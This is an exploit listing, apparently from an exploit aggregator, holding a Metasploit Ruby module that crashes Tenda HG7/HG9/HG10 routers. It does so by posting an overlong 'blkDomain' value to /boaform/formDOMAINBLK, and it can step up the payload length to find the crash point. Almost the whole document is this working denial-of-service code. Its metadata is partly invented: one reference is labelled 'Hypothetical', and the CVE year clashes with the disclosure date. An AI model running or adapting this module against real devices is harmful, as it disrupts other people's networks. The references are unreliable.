Share
## https://sploitus.com/exploit?id=PACKETSTORM:225132
==================================================================================================================================
| # Title : Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow Metasploit DoS Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.tendacn.com/material/show/105719 |
==================================================================================================================================
[+] Summary : This module is a Metasploit auxiliary scanner/DoS module designed to test a stack-based buffer overflow condition affecting specific Tenda router models through the /boaform/formDOMAINBLK endpoint.
The issue is associated with oversized input supplied to the blkDomain parameter, potentially causing service instability or device crashes.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow DoS',
'Description' => %q{
This module triggers a stack-based buffer overflow vulnerability in the
/boaform/formDOMAINBLK endpoint of Tenda HG7, HG9, and HG10 routers.
The vulnerability exists in the 'blkDomain' parameter.
Sending an overly long string causes a crash and denial of service.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2026-11499'],
['URL', 'https://github.com/0xBlackash/CVE-2026-11499'] # Hypothetical
],
'DisclosureDate' => '2024-01-15',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [DOS_MODULE],
'Reliability' => []
},
'DefaultOptions' => {
'RPORT' => 80,
'SSL' => false
}
)
)
register_options([
OptInt.new('PAYLOAD_LENGTH', [false, 'Length of the buffer overflow payload', 400]),
OptBool.new('INCREMENTAL', [false, 'Incrementally increase payload size', false]),
OptInt.new('STEP_SIZE', [false, 'Incremental step size', 50]),
OptInt.new('START_LENGTH', [false, 'Starting length for incremental mode', 100]),
OptInt.new('END_LENGTH', [false, 'Ending length for incremental mode', 1000]),
OptInt.new('DELAY', [false, 'Delay between requests in incremental mode (seconds)', 2])
])
end
def run_host(ip)
target_url = "http://#{ip}:#{rport}"
if datastore['INCREMENTAL']
print_status("Incremental mode - finding approximate crash offset...")
start_len = datastore['START_LENGTH']
end_len = datastore['END_LENGTH']
step = datastore['STEP_SIZE']
delay = datastore['DELAY']
(start_len..end_len).step(step) do |length|
print_status("Testing length: #{length}")
send_payload(target_url, length)
print_status("Waiting #{delay} seconds...")
sleep(delay)
end
else
send_payload(target_url, datastore['PAYLOAD_LENGTH'])
end
print_good("DoS attempt completed. Check if #{ip} is responsive.")
end
def send_payload(target_url, length)
payload = 'A' * length
data = {
'blkDomain' => payload,
'submit-url' => '/domainblk.asp',
'page' => 'domainblk'
}
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/boaform/formDOMAINBLK',
'vars_post' => data,
'headers' => {
'Referer' => "#{target_url}/domainblk.asp"
}
}, datastore['WfsDelay'])
if res
print_good("HTTP Status: #{res.code}")
return true
else
print_status("No response (timeout/refused) - likely crashed")
return true
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Errno::ECONNRESET
print_status("Connection error - crash successful!")
return true
rescue => e
print_error("Error: #{e.message}")
return false
end
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================